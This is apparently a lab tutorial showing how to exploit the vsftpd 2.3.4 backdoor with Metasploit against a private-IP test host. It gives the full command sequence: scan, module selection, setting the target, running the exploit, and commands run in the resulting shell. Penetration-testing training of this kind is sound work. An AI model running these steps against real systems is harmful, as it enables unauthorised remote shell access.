VSFTPD v2.3.4 Backdoor

Attack FTP Service – This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.

db_nmap 172.16.74.129 -sC -A -vvv

vsftpd 2.3.4

First open metasploit and search for the vulnerable service vsftpd 2.3.4

search vsftpd
search 73573
use exploit/unix/ftp/vsftpd_234_backdoor

Attack FTP Service
Attack FTP Service
set RHOSTS 172.16.74.129
run

Invoke Bash Shell

> shell
> bash
> whoami
> uname -a
> ip a | grep inet4

References

  • OSVDB-73573

Attack Samba Server Port 445 – Metasploitable

https://security.appspot.com/vsftpd.html

Learn How to Bruteforce FTP Service

How to Attack FTP Servers port 21

Oh hi there 👋 It’s nice to meet you.

Sign up to receive awesome content in your inbox, every month.

Read our privacy policy for more info.

PopLAbSec_Logo

Hacking tips!

We don’t spam! Read our privacy policy for more info.